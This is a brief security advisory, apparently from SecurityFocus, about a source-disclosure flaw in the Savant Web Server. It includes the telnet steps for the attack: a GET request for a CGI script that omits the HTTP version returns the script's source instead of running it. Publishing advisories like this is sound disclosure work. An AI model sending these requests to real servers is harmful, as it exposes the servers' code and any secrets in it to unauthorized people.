source: https://www.securityfocus.com/bid/1313/info
Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script.
telnet target 80
GET /cgi-bin/script.xyz HTTP/1.0
<proper script execution/output>
GET /cgi-bin/script.xyz
<source code displayed>